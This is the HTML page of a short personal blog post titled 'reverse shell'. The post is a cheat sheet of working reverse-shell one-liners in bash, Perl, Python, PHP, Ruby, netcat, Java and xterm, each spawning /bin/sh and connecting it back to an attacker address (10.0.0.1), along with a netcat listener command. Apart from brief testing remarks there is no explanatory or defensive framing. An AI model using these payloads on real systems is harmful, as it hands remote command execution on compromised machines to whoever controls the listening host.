<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>reverse shell - Feisky</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="Feisky" />
  <meta name="description" content="Listen for 8080 first  nc -l -p 8080 -vvv  Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
 bash -i &amp; /dev/tcp/10.0.0.1/8080 0&amp;1  PERL Here’s a shorter, feature-free version of the perl-reverse-shell:
 perl -e &#39;use Socket;$i=&#34;10.0.0.1&#34;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#34;tcp&#34;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&#34;&amp;S&#34;);open(STDOUT,&#34;&amp;S&#34;);open(STDERR,&#34;&amp;S&#34;);exec(&#34;/bin/sh -i&#34;);};&#39;  There’s also an&amp;nbsp;alternative PERL revere shell here.
Python This was tested under Linux / Python 2.7:
 python -c &#39;import socket,subprocess,os;s=socket." />

  <meta name="keywords" content="Kubernetes, Cloud, SDN" />






<meta name="generator" content="Hugo 0.37.1" />


<link rel="canonical" href="https://feisky.xyz/post/2015-01-28-reverse-shell/" />

<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">







<link href="/dist/even.min.css?v=3.1.1" rel="stylesheet">
<link href="/lib/fancybox/jquery.fancybox-3.1.20.min.css" rel="stylesheet">




<meta property="og:title" content="reverse shell" />
<meta property="og:description" content="Listen for 8080 first  nc -l -p 8080 -vvv  Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
 bash -i & /dev/tcp/10.0.0.1/8080 0&1  PERL Here’s a shorter, feature-free version of the perl-reverse-shell:
 perl -e &#39;use Socket;$i=&#34;10.0.0.1&#34;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#34;tcp&#34;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&#34;&S&#34;);open(STDOUT,&#34;&S&#34;);open(STDERR,&#34;&S&#34;);exec(&#34;/bin/sh -i&#34;);};&#39;  There’s also an&nbsp;alternative PERL revere shell here.
Python This was tested under Linux / Python 2.7:
 python -c &#39;import socket,subprocess,os;s=socket." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://feisky.xyz/post/2015-01-28-reverse-shell/" />




<meta property="article:modified_time" content="2018-04-01T22:42:21&#43;08:00"/>











<meta itemprop="name" content="reverse shell">
<meta itemprop="description" content="Listen for 8080 first  nc -l -p 8080 -vvv  Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
 bash -i & /dev/tcp/10.0.0.1/8080 0&1  PERL Here’s a shorter, feature-free version of the perl-reverse-shell:
 perl -e &#39;use Socket;$i=&#34;10.0.0.1&#34;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#34;tcp&#34;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&#34;&S&#34;);open(STDOUT,&#34;&S&#34;);open(STDERR,&#34;&S&#34;);exec(&#34;/bin/sh -i&#34;);};&#39;  There’s also an&nbsp;alternative PERL revere shell here.
Python This was tested under Linux / Python 2.7:
 python -c &#39;import socket,subprocess,os;s=socket.">



<meta itemprop="wordCount" content="298">



<meta itemprop="keywords" content="" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="reverse shell"/>
<meta name="twitter:description" content="Listen for 8080 first  nc -l -p 8080 -vvv  Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
 bash -i & /dev/tcp/10.0.0.1/8080 0&1  PERL Here’s a shorter, feature-free version of the perl-reverse-shell:
 perl -e &#39;use Socket;$i=&#34;10.0.0.1&#34;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#34;tcp&#34;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&#34;&S&#34;);open(STDOUT,&#34;&S&#34;);open(STDERR,&#34;&S&#34;);exec(&#34;/bin/sh -i&#34;);};&#39;  There’s also an&nbsp;alternative PERL revere shell here.
Python This was tested under Linux / Python 2.7:
 python -c &#39;import socket,subprocess,os;s=socket."/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo">Feisky</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="https://kubernetes.feisky.xyz">
        <li class="mobile-menu-item">Kubernetes</li>
      </a><a href="https://sdn.feisky.xyz">
        <li class="mobile-menu-item">SDN</li>
      </a><a href="/distributed/">
        <li class="mobile-menu-item">分布式系统</li>
      </a><a href="/container/">
        <li class="mobile-menu-item">容器</li>
      </a><a href="/machine-learning/">
        <li class="mobile-menu-item">机器学习</li>
      </a><a href="https://zhuanlan.zhihu.com/kubernetes">
        <li class="mobile-menu-item">知乎</li>
      </a><a href="/docs/">
        <li class="mobile-menu-item">读书笔记</li>
      </a>
  </ul>
</nav>
  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="/" class="logo">Feisky</a>
</div>

<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="https://kubernetes.feisky.xyz">Kubernetes</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="https://sdn.feisky.xyz">SDN</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/distributed/">分布式系统</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/container/">容器</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/machine-learning/">机器学习</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="https://zhuanlan.zhihu.com/kubernetes">知乎</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/docs/">读书笔记</a>
      </li>
  </ul>
</nav>

    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">reverse shell</h1>

      <div class="post-meta">
        <span class="post-time"> 0001-01-01 </span>
        
        <span class="more-meta"> 298 words </span>
        <span class="more-meta"> 2 mins read </span>
        
      </div>
    </header>

    
    
<div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Contents</h2>
  
  <div class="post-toc-content">
    <nav id="TableOfContents">
<ul>
<li>
<ul>
<li>
<ul>
<li><a href="#listen-for-8080-first">Listen for 8080 first</a></li>
<li><a href="#bash">Bash</a></li>
<li><a href="#perl">PERL</a></li>
<li><a href="#python">Python</a></li>
<li><a href="#php">PHP</a></li>
<li><a href="#ruby">Ruby</a></li>
<li><a href="#netcat">Netcat</a></li>
<li><a href="#java">Java</a></li>
<li><a href="#xterm">xterm</a></li>
</ul></li>
</ul></li>
</ul>
</nav>
  </div>
</div>

    
    <div class="post-content">
      

<h3 id="listen-for-8080-first">Listen for 8080 first</h3>

<pre>
nc -l -p 8080 -vvv
</pre>

<h3 id="bash">Bash</h3>

<p>Some versions of <a href="http://www.gnucitizen.org/blog/reverse-shell-with-bash/">bash can send you a reverse shell</a> (this was tested on Ubuntu 10.10):</p>

<pre>
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
</pre>

<h3 id="perl">PERL</h3>

<p>Here’s a shorter, feature-free version of the <a href="http://pentestmonkey.net/tools/web-shells/perl-reverse-shell">perl-reverse-shell</a>:</p>

<pre>
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
</pre>

<p>There’s also an&nbsp;<a href="http://www.plenz.com/reverseshell">alternative PERL revere shell here</a>.</p>

<h3 id="python">Python</h3>

<p>This was tested under Linux / Python 2.7:</p>

<pre>
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
</pre>

<h3 id="php">PHP</h3>

<p>This code assumes that the TCP connection uses file descriptor 3. &nbsp;This worked on my test system. &nbsp;If it doesn’t work, try 4, 5, 6…</p>

<pre>
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
</pre>

<p>If you want a .php file to upload, see the more featureful and robust <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell">php-reverse-shell</a>.</p>

<h3 id="ruby">Ruby</h3>

<pre>
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
</pre>

<h3 id="netcat">Netcat</h3>

<p>Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.</p>

<pre>
nc -e /bin/sh 10.0.0.1 1234
</pre>

<p>If you have the wrong version of netcat installed, <a href="http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-127498">Jeff Price points out here</a> that you might still be able to get your reverse shell back like this:</p>

<pre>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
</pre>

<h3 id="java">Java</h3>

<pre>
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
</pre>

<p>[Untested submission from anonymous reader]</p>

<h3 id="xterm">xterm</h3>

<p>One of the simplest forms of reverse shell is an xterm session. &nbsp;The following command should be run on the server. &nbsp;It will try to connect back to you (10.0.0.1) on TCP port 6001.</p>

<pre>
xterm -display 10.0.0.1:1
</pre>

<p>To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). &nbsp;One way to do this is with Xnest (to be run on your system):</p>

<pre>
Xnest :1
</pre>

<p>You’ll need to authorise the target to connect to you (command also run on your host):</p>

<pre>
xhost +targetip
</pre>

    </div>

    
    <div class="post-copyright">
  <p class="copyright-item">
    <span class="item-title">Author</span>
    <span class="item-content">Feisky</span>
  </p>
  <p class="copyright-item">
    <span class="item-title">LastMod</span>
    <span class="item-content">2018-04-01</span>
  </p>
  
  <p class="copyright-item">
    <span class="item-title">License</span>
    <span class="item-content"><a rel="license noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a></span>
  </p>
</div>

    
    

    <footer class="post-footer">
      

      
      <nav class="post-nav">
        
          <a class="prev" href="/post/2015-06-05-git-commit/">
            <i class="iconfont icon-left"></i>
            <span class="prev-text nav-default">git commit修改前一次提交的方法</span>
            <span class="prev-text nav-mobile">Prev</span>
          </a>
        
          <a class="next" href="/post/2015-06-24-sysdig/">
            <span class="next-text nav-default">sysdig</span>
            <span class="prev-text nav-mobile">Next</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        
  <div id="disqus_thread"></div>
    <script type="text/javascript">
    (function() {
      
      
      if (window.location.hostname === 'localhost') return;

      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      var disqus_shortname = 'feisky';
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
    </script>
    <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="social-links">
      <a href="https://twitter.com/feisky" class="iconfont icon-twitter" title="twitter"></a>
      <a href="https://github.com/feiskyer" class="iconfont icon-github" title="github"></a>
      <a href="https://weibo.com/371069890" class="iconfont icon-weibo" title="weibo"></a>
      <a href="https://www.zhihu.com/people/feisky" class="iconfont icon-zhihu" title="zhihu"></a>
  <a href="https://feisky.xyz/index.xml" type="application/rss+xml" class="iconfont icon-rss" title="rss"></a>
</div>

<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://gohugo.io">Hugo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/olOwOlo/hugo-theme-even">Even</a>
  </span>

  

  <span class="copyright-year">
    &copy; 
    
      2014 - 
    2018
    <span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">Feisky</span>
  </span>
</div>
    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
<script src="/lib/highlight/highlight.pack.js?v=20171001"></script><script type="text/javascript" src="/lib/jquery/jquery-3.2.1.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout-1.0.1.min.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox-3.1.20.min.js"></script><script></script>
<script src="https://cdn.jsdelivr.net/npm/raphael@2.2.7/raphael.min.js" integrity="sha256-67By+NpOtm9ka1R6xpUefeGOY8kWWHHRAKlvaTJ7ONI=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/flowchart.js@1.8.0/release/flowchart.min.js" integrity="sha256-zNGWjubXoY6rb5MnmpBNefO0RgoVYfle9p0tvOQM+6k=" crossorigin="anonymous"></script><script></script>
<script src="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.js" integrity="sha256-4O4pS1SH31ZqrSO2A/2QJTVjTPqVe+jnYgOWUVr7EEc=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/snapsvg@0.5.1/dist/snap.svg-min.js" integrity="sha256-oI+elz+sIm+jpn8F/qEspKoKveTc5uKeFHNNVexe6d8=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/underscore@1.8.3/underscore-min.js" integrity="sha256-obZACiHd7gkOk9iIL/pimWMTJ4W/pBsKu+oZnSeBIek=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/bramp/js-sequence-diagrams@2.0.1/dist/sequence-diagram-min.js" integrity="sha384-8748Vn52gHJYJI0XEuPB2QlPVNUkJlJn9tHqKec6J3q2r9l8fvRxrgn/E5ZHV0sP" crossorigin="anonymous"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/bramp/js-sequence-diagrams@2.0.1/dist/sequence-diagram-min.css" integrity="sha384-6QbLKJMz5dS3adWSeINZe74uSydBGFbnzaAYmp+tKyq60S7H2p6V7g1TysM5lAaF" crossorigin="anonymous">
<script type="text/javascript" src="/dist/even.min.js?v=3.1.1"></script>
  <script type="text/javascript">
    window.MathJax = {
      tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]},
      showProcessingMessages: false,
      messageStyle: 'none'
    };
  </script>
  <script type="text/javascript" async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_CHTML"></script>


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-69699206-1', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>
<script id="baidu_analytics">
  var _hmt = _hmt || [];
  (function() {
    if (window.location.hostname === 'localhost') return;
    var hm = document.createElement("script"); hm.async = true;
    hm.src = "https://hm.baidu.com/hm.js?d2f4aad4d3f8dc2de9170fa1df3fcbcf";
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
  })();
</script>

<script id="baidu_push">
  (function(){
    if (window.location.hostname === 'localhost') return;
    var bp = document.createElement('script'); bp.async = true;
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
      bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
      bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
  })();
</script>




</body>
</html>
